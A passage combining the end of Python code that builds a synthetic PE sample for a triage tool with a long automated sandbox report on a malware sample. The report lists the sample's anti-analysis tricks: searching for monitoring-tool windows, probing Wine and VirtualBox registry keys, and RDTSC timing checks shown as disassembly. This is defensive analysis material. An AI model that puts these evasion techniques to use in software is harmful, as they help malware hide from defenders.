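    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)  # i386, EXECUTABLE_IMAGE|32BIT_MACHINE
    opt = struct.pack(OPT_HDR_FMT, 0x10B, 14, 0, 0, 0, 0, entry_rva, sect_align, 0, 0x400000,
                      sect_align, file_align, 6, 0, 0, 0, 6, 0, 0, sect_align * (len(sections) + 1),
                      size_of_headers, 0, 2, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * 128
    table, bodies, raw_ptr = b"", b"", size_of_headers
    for i, (name, body, chars) in enumerate(sections):
        raw_size = -(-len(body) // file_align) * file_align
        table += struct.pack(SECTION_FMT, name, len(body), sect_align * (i + 1), raw_size, raw_ptr, 0, 0, 0, 0, chars)
        bodies += body.ljust(raw_size, b"\0")
        raw_ptr += raw_size
    return (dos + b"PE\0\0" + file_hdr + opt + table).ljust(size_of_headers, b"\0") + bodies

def pseudo_random(n: int) -> bytes:
    """Deterministic high-entropy filler standing in for a packed payload."""
    return b"".join(hashlib.sha256(bytes([i])).digest() for i in range(-(-n // 32)))[:n]

SAMPLE = build_sample_pe([
    (b"\x01\x02", b"\0" * 64, 0xE0000020),                # non-printable section name
    (b".rsrc", b"\0" * 256, 0x40000040),
    (b"fozyxqhw", pseudo_random(4096), 0xE0000040),      # packed payload, entropy close to 8
    (b".taggant", b"\xEB\xFE" + b"\0" * 30, 0xE0000020), # entry point lands here
], entry_rva=0x4000)
```

triage(SAMPLE) reports a blank first section name, fozyxqhw above the entropy threshold, .taggant as the entry-point section (outside the standard set) and a checksum mismatch; triage(fix_checksum(SAMPLE)) clears the mismatch. Point triage() at the bytes of a real file to get the same fields for it; the "oversized" flag reproduces the report's raw-size check.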

Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00699BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00699BB0

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE7CB8 second address: AE7CCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE7CCD second address: AE7CF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8838h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jnl 00007F0AD95F8826h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE6DAE second address: AE6DB8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0AD8C6A9C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE6DB8 second address: AE6DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE6DBE second address: AE6DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0AD8C6A9C8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE6DDF second address: AE6DE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE6DE3 second address: AE6DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F0AD8C6A9C2h 0x0000000e ja 00007F0AD8C6A9B6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE70EE second address: AE70F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE70F2 second address: AE7102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F0AD8C6A9BCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE7102 second address: AE7128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F0AD95F884Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0AD95F8839h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE7569 second address: AE7575 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F0AD8C6A9B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE7575 second address: AE757A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9CCD second address: AE9CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9CD3 second address: 96DB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 30D845EBh 0x0000000d mov edx, dword ptr [ebp+122D2A29h] 0x00000013 push dword ptr [ebp+122D1595h] 0x00000019 mov si, cx 0x0000001c call dword ptr [ebp+122D3589h] 0x00000022 pushad 0x00000023 jng 00007F0AD95F882Ch 0x00000029 xor eax, eax 0x0000002b jmp 00007F0AD95F882Eh 0x00000030 add dword ptr [ebp+122D34B1h], ebx 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a or dword ptr [ebp+122D34B1h], ebx 0x00000040 add dword ptr [ebp+122D34B1h], edi 0x00000046 mov dword ptr [ebp+122D29C9h], eax 0x0000004c mov dword ptr [ebp+122D34B1h], edi 0x00000052 mov esi, 0000003Ch 0x00000057 mov dword ptr [ebp+122D2E75h], edx 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 jg 00007F0AD95F8827h 0x00000067 lodsw 0x00000069 jmp 00007F0AD95F8832h 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 jmp 00007F0AD95F882Eh 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b mov dword ptr [ebp+122D34B1h], edi 0x00000081 push eax 0x00000082 pushad 0x00000083 push esi 0x00000084 push eax 0x00000085 push edx 0x00000086 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9D01 second address: AE9D07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9D07 second address: AE9D53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8839h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or ecx, dword ptr [ebp+122D2C21h] 0x00000012 push 00000000h 0x00000014 mov dx, di 0x00000017 call 00007F0AD95F8829h 0x0000001c jnp 00007F0AD95F8832h 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9D53 second address: AE9D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9D57 second address: AE9DA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F0AD95F8837h 0x0000000c pop ebx 0x0000000d popad 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push esi 0x00000013 push edi 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pop edi 0x00000017 pop esi 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007F0AD95F8830h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jns 00007F0AD95F8826h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9DA1 second address: AE9DBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9DBE second address: AE9E47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov esi, 72B4BA4Bh 0x00000010 mov dword ptr [ebp+122D37E6h], ecx 0x00000016 push 00000003h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F0AD95F8828h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 je 00007F0AD95F882Ch 0x00000038 mov dword ptr [ebp+122D274Fh], edx 0x0000003e push 00000000h 0x00000040 or edi, dword ptr [ebp+122D2A5Dh] 0x00000046 push 00000003h 0x00000048 jmp 00007F0AD95F8837h 0x0000004d call 00007F0AD95F8829h 0x00000052 jmp 00007F0AD95F8831h 0x00000057 push eax 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9E47 second address: AE9E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9E4B second address: AE9EA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 jmp 00007F0AD95F882Fh 0x00000017 push edi 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop edi 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e jno 00007F0AD95F8840h 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jo 00007F0AD95F882Ch 0x00000030 jg 00007F0AD95F8826h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9EA5 second address: AE9EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9EAB second address: AE9EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9EAF second address: AE9ED6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d mov dword ptr [ebp+122D1B3Dh], ebx 0x00000013 lea ebx, dword ptr [ebp+1244FC0Ch] 0x00000019 add dword ptr [ebp+122D27BEh], edx 0x0000001f mov edi, edx 0x00000021 push eax 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEA089 second address: AEA08D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEA08D second address: AEA091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEA19C second address: AEA1E9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b add dword ptr [esp], 22BA316Ah 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F0AD95F8828h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov cx, B331h 0x00000030 lea ebx, dword ptr [ebp+1244FC20h] 0x00000036 add edi, 067E2900h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jnp 00007F0AD95F8828h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0992B second address: B09931 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B09AA9 second address: B09ADA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0AD95F8830h 0x0000000a jmp 00007F0AD95F8835h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B09ADA second address: B09AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 ja 00007F0AD8C6A9BEh 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B09AF2 second address: B09B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F882Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B09EE9 second address: B09EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B09EED second address: B09F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0AD95F8826h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F0AD95F8833h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A06F second address: B0A093 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F0AD8C6A9B6h 0x00000011 jmp 00007F0AD8C6A9BDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A1D5 second address: B0A1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A1DB second address: B0A1DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A1DF second address: B0A1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A1E5 second address: B0A202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0AD8C6A9C5h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A202 second address: B0A24D instructions: 0x00000000 rdtsc 0x00000002 js 00007F0AD95F8826h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0AD95F882Dh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F0AD95F882Ah 0x0000001a jmp 00007F0AD95F882Ch 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F0AD95F8833h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A24D second address: B0A251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A251 second address: B0A255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A255 second address: B0A25B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A25B second address: B0A279 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 jo 00007F0AD95F883Ch 0x0000000c jmp 00007F0AD95F8830h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A3AE second address: B0A3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0AD8C6A9C5h 0x0000000b jmp 00007F0AD8C6A9BDh 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A70D second address: B0A736 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F882Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0AD95F8836h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A898 second address: B0A8AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jl 00007F0AD8C6A9B6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A8AB second address: B0A8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F882Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A8BC second address: B0A8D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A8D0 second address: B0A8D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A8D6 second address: B0A8DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A8DA second address: B0A8E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0B239 second address: B0B23D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0B3C8 second address: B0B3DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8831h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0B3DF second address: B0B3F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0B51D second address: B0B53D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0AD95F8836h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0B53D second address: B0B55A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0AD8C6A9C5h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0B86C second address: B0B870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B165D0 second address: B16601 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BFh 0x00000007 jmp 00007F0AD8C6A9C0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F0AD8C6A9BEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B168B7 second address: B168BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B16B33 second address: B16B47 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F0AD8C6A9B8h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B16DCA second address: B16DE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F0AD95F8826h 0x00000009 jnl 00007F0AD95F8826h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 je 00007F0AD95F882Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B16DE4 second address: B16DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F0AD8C6A9F1h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B16DF8 second address: B16E0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F882Ch 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B16E0E second address: B16E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18F7D second address: B18F87 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18F87 second address: B18FCD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0AD8C6A9B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jp 00007F0AD8C6A9CAh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push ebx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F0AD8C6A9BEh 0x0000001e popad 0x0000001f pop ebx 0x00000020 mov eax, dword ptr [eax] 0x00000022 push edi 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 pop eax 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B193B5 second address: B193BF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B193BF second address: B193CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0AD8C6A9BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B193CF second address: B193D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B193D3 second address: B193E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B19C01 second address: B19C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B19C09 second address: B19C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1A0AF second address: B1A0D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8837h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnp 00007F0AD95F8830h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1A13F second address: B1A149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0AD8C6A9B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1A1C7 second address: B1A1D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F882Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
